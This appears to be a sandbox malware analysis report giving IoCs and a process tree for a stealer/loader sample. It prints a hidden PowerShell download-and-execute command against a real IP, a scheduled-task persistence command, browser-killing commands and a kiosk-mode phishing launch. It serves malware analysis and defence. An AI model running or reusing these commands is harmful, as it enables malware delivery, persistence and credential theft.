Token: SeSystemEnvironmentPrivilege	4536	MSBuild.exe
Token: SeRemoteShutdownPrivilege	4536	MSBuild.exe
Token: SeUndockPrivilege	4536	MSBuild.exe
Token: SeManageVolumePrivilege	4536	MSBuild.exe
Token: 33	4536	MSBuild.exe
Token: 34	4536	MSBuild.exe
Token: 35	4536	MSBuild.exe
Token: 36	4536	MSBuild.exe
Token: SeIncreaseQuotaPrivilege	4536	MSBuild.exe
Token: SeSecurityPrivilege	4536	MSBuild.exe
Token: SeTakeOwnershipPrivilege	4536	MSBuild.exe
Token: SeLoadDriverPrivilege	4536	MSBuild.exe
Token: SeSystemProfilePrivilege	4536	MSBuild.exe
Token: SeSystemtimePrivilege	4536	MSBuild.exe
Token: SeProfSingleProcessPrivilege	4536	MSBuild.exe
Token: SeIncBasePriorityPrivilege	4536	MSBuild.exe
Token: SeCreatePagefilePrivilege	4536	MSBuild.exe
Token: SeBackupPrivilege	4536	MSBuild.exe
Token: SeRestorePrivilege	4536	MSBuild.exe
Token: SeShutdownPrivilege	4536	MSBuild.exe
Token: SeDebugPrivilege	4536	MSBuild.exe
Token: SeSystemEnvironmentPrivilege	4536	MSBuild.exe
Token: SeRemoteShutdownPrivilege	4536	MSBuild.exe
Token: SeUndockPrivilege	4536	MSBuild.exe
Token: SeManageVolumePrivilege	4536	MSBuild.exe
Token: 33	4536	MSBuild.exe
Token: 34	4536	MSBuild.exe
Token: 35	4536	MSBuild.exe
Token: 36	4536	MSBuild.exe
Token: SeDebugPrivilege	3916	taskkill.exe
Token: SeDebugPrivilege	5964	taskkill.exe
Token: SeDebugPrivilege	3368	taskkill.exe
Token: SeDebugPrivilege	1496	taskkill.exe
Token: SeDebugPrivilege	3964	taskkill.exe
Token: SeShutdownPrivilege	3412	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3412	msiexec.exe
Token: SeSecurityPrivilege	1372	msiexec.exe
Token: SeCreateTokenPrivilege	3412	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3412	msiexec.exe
Token: SeLockMemoryPrivilege	3412	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3412	msiexec.exe
Token: SeMachineAccountPrivilege	3412	msiexec.exe
Token: SeTcbPrivilege	3412	msiexec.exe
Token: SeSecurityPrivilege	3412	msiexec.exe
Token: SeTakeOwnershipPrivilege	3412	msiexec.exe
Token: SeLoadDriverPrivilege	3412	msiexec.exe
Token: SeSystemProfilePrivilege	3412	msiexec.exe
Token: SeSystemtimePrivilege	3412	msiexec.exe
Token: SeProfSingleProcessPrivilege	3412	msiexec.exe

Suspicious use of FindShellTrayWindow 41 IoCs

pid	Process
2964	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2964	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2964	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
2384	firefox.exe
5528	efe6bfcae2.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
5528	efe6bfcae2.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
5528	efe6bfcae2.exe
2384	firefox.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
3756	rundll32.exe
3860	rundll32.exe
2804	rundll32.exe
4472	MSBuild.exe
4036	msedge.exe
6440	chrome.exe
6980	rundll32.exe
2168	rundll32.exe

Suspicious use of SendNotifyMessage 27 IoCs

pid	Process
2964	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2964	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
2964	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
5528	efe6bfcae2.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
2384	firefox.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe
5528	efe6bfcae2.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2384	firefox.exe
4472	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2964 wrote to memory of 3632	2964	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 2964 wrote to memory of 3632	2964	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 2964 wrote to memory of 3632	2964	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	86
PID 2964 wrote to memory of 5884	2964	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 2964 wrote to memory of 5884	2964	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 2964 wrote to memory of 5884	2964	2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe	87
PID 3632 wrote to memory of 4928	3632	cmd.exe	89
PID 3632 wrote to memory of 4928	3632	cmd.exe	89
PID 3632 wrote to memory of 4928	3632	cmd.exe	89
PID 5884 wrote to memory of 2904	5884	mshta.exe	92
PID 5884 wrote to memory of 2904	5884	mshta.exe	92
PID 5884 wrote to memory of 2904	5884	mshta.exe	92
PID 2904 wrote to memory of 5476	2904	powershell.exe	99
PID 2904 wrote to memory of 5476	2904	powershell.exe	99
PID 2904 wrote to memory of 5476	2904	powershell.exe	99
PID 5476 wrote to memory of 5392	5476	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE	101
PID 5476 wrote to memory of 5392	5476	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE	101
PID 5476 wrote to memory of 5392	5476	Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE	101
PID 5392 wrote to memory of 3916	5392	rapes.exe	104
PID 5392 wrote to memory of 3916	5392	rapes.exe	104
PID 3916 wrote to memory of 4536	3916	v1BRaoR.exe	105
PID 3916 wrote to memory of 4536	3916	v1BRaoR.exe	105
PID 3916 wrote to memory of 4536	3916	v1BRaoR.exe	105
PID 3916 wrote to memory of 4536	3916	v1BRaoR.exe	105
PID 3916 wrote to memory of 4536	3916	v1BRaoR.exe	105
PID 3916 wrote to memory of 4536	3916	v1BRaoR.exe	105
PID 3916 wrote to memory of 4536	3916	v1BRaoR.exe	105
PID 3916 wrote to memory of 4536	3916	v1BRaoR.exe	105
PID 5392 wrote to memory of 3860	5392	rapes.exe	109
PID 5392 wrote to memory of 3860	5392	rapes.exe	109
PID 3860 wrote to memory of 860	3860	Nehh6wZ.exe	110
PID 3860 wrote to memory of 860	3860	Nehh6wZ.exe	110
PID 3860 wrote to memory of 860	3860	Nehh6wZ.exe	110
PID 3860 wrote to memory of 860	3860	Nehh6wZ.exe	110
PID 3860 wrote to memory of 860	3860	Nehh6wZ.exe	110
PID 3860 wrote to memory of 860	3860	Nehh6wZ.exe	110
PID 3860 wrote to memory of 860	3860	Nehh6wZ.exe	110
PID 3860 wrote to memory of 860	3860	Nehh6wZ.exe	110
PID 3860 wrote to memory of 860	3860	Nehh6wZ.exe	110
PID 5392 wrote to memory of 3004	5392	rapes.exe	111
PID 5392 wrote to memory of 3004	5392	rapes.exe	111
PID 3004 wrote to memory of 1248	3004	31W3sid.exe	112
PID 3004 wrote to memory of 1248	3004	31W3sid.exe	112
PID 3004 wrote to memory of 1248	3004	31W3sid.exe	112
PID 3004 wrote to memory of 1248	3004	31W3sid.exe	112
PID 3004 wrote to memory of 1248	3004	31W3sid.exe	112
PID 3004 wrote to memory of 1248	3004	31W3sid.exe	112
PID 5392 wrote to memory of 816	5392	rapes.exe	113
PID 5392 wrote to memory of 816	5392	rapes.exe	113
PID 816 wrote to memory of 1564	816	NlmvJyQ.exe	114
PID 816 wrote to memory of 1564	816	NlmvJyQ.exe	114
PID 816 wrote to memory of 1564	816	NlmvJyQ.exe	114
PID 816 wrote to memory of 1564	816	NlmvJyQ.exe	114
PID 816 wrote to memory of 1564	816	NlmvJyQ.exe	114
PID 816 wrote to memory of 1564	816	NlmvJyQ.exe	114
PID 816 wrote to memory of 1564	816	NlmvJyQ.exe	114
PID 816 wrote to memory of 1564	816	NlmvJyQ.exe	114
PID 816 wrote to memory of 1564	816	NlmvJyQ.exe	114
PID 5392 wrote to memory of 4460	5392	rapes.exe	116
PID 5392 wrote to memory of 4460	5392	rapes.exe	116
PID 4460 wrote to memory of 5500	4460	efd0386a9c.exe	117
PID 4460 wrote to memory of 5500	4460	efd0386a9c.exe	117
PID 4460 wrote to memory of 5500	4460	efd0386a9c.exe	117
PID 4460 wrote to memory of 5500	4460	efd0386a9c.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-446031748-3036493239-2009529691-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /tn GzgPtmadBI5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\TJ9oCeFwZ.hta" /sc minute /mo 25 /ru "Admin" /f
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3632
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /tn GzgPtmadBI5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\TJ9oCeFwZ.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4928
- C:\Windows\SysWOW64\mshta.exe
  mshta C:\Users\Admin\AppData\Local\Temp\TJ9oCeFwZ.hta
  2⤵
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5884
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Downloads MZ/PE file
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2904
  - - C:\Users\Admin\AppData\Local\Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE
      "C:\Users\Admin\AppData\Local\Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:5476
    - - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Adds Run key to start application
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:5392
      - C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3916
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4536
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 1384
        8⤵
        Program crash
        
        PID:1984
      - C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3860
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:860
      - C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3004
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Checks SCSI registry key(s)
        
        PID:1248
      - C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:816
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1564
      - C:\Users\Admin\AppData\Local\Temp\10494470101\efd0386a9c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494470101\efd0386a9c.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4460
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5500
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 1328
        8⤵
        Program crash
        
        PID:1748
      - C:\Users\Admin\AppData\Local\Temp\10494480101\5c814807ae.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494480101\5c814807ae.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2704
      - C:\Users\Admin\AppData\Local\Temp\10494490101\352038b977.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494490101\352038b977.exe"
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        
        PID:5656
      - C:\Users\Admin\AppData\Local\Temp\10494500101\efe6bfcae2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494500101\efe6bfcae2.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5528
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3916
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5964
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3368
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1496
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:2504
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:2384
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27099 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2080 -initialChannelId {e180e26d-d945-4f8d-928c-60d98a3067d4} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
        9⤵
        
        PID:4476
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {f1e29b3c-231c-4149-b88c-51c64f47aa84} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
        9⤵
        
        PID:5748
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3888 -prefsLen 25164 -prefMapHandle 3892 -prefMapSize 270279 -jsInitHandle 3896 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3904 -initialChannelId {ddbefdf2-d68e-462c-a6a6-233f45aed643} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
        9⤵
        Checks processor information in registry
        
        PID:5044
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4048 -prefsLen 27276 -prefMapHandle 4052 -prefMapSize 270279 -ipcHandle 4148 -initialChannelId {d407d8ce-9ca9-408f-b101-553da4b8041b} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
        9⤵
        
        PID:5588
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3128 -prefsLen 34775 -prefMapHandle 3920 -prefMapSize 270279 -jsInitHandle 2740 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4404 -initialChannelId {8eeeea2e-fde5-4898-a67c-adcb5eb7320c} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
        9⤵
        Checks processor information in registry
        
        PID:2624
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5076 -prefsLen 35012 -prefMapHandle 5080 -prefMapSize 270279 -ipcHandle 5088 -initialChannelId {bcc20330-895b-44d9-9421-183aa661e926} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
        9⤵
        Checks processor information in registry
        
        PID:4800
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5276 -prefsLen 32952 -prefMapHandle 5272 -prefMapSize 270279 -jsInitHandle 5268 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5368 -initialChannelId {c135734b-7074-4689-adfe-12e903c2f35a} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
        9⤵
        Checks processor information in registry
        
        PID:3652
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5540 -prefsLen 32952 -prefMapHandle 5544 -prefMapSize 270279 -jsInitHandle 5548 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5376 -initialChannelId {3c776e85-7713-4287-b9a8-07cdcc52e05c} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
        9⤵
        Checks processor information in registry
        
        PID:4676
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5736 -prefsLen 32952 -prefMapHandle 5740 -prefMapSize 270279 -jsInitHandle 5744 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5572 -initialChannelId {0125919d-f302-412e-ba94-1443c101c631} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
        9⤵
        Checks processor information in registry
        
        PID:3004
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10494510271\33e3372c0a.msi" /quiet
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3412
      - C:\Users\Admin\AppData\Local\Temp\10494520101\367de4acd7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494520101\367de4acd7.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5776
      - C:\Users\Admin\AppData\Local\Temp\10494530101\f078cfe6f7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494530101\f078cfe6f7.exe"
        6⤵
        Executes dropped EXE
        
        PID:632
      - C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:396
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Checks SCSI registry key(s)
        
        PID:2096
      - C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe"
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        
        PID:5776
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\girrhuqn\girrhuqn.cmdline"
        7⤵
        
        PID:5412
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB263.tmp" "c:\Users\Admin\AppData\Local\Temp\girrhuqn\CSCFD411049ADB451ABD77B5F2146D9A25.TMP"
        8⤵
        
        PID:4852
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        Downloads MZ/PE file
        Accesses Microsoft Outlook accounts
        Accesses Microsoft Outlook profiles
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        outlook_office_path
        outlook_win_path
        
        PID:4472
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:3756
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:3860
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
        8⤵
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        
        PID:2804
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
        8⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:4036
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ffb818cf208,0x7ffb818cf214,0x7ffb818cf220
        9⤵
        
        PID:4996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2284,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:3
        9⤵
        
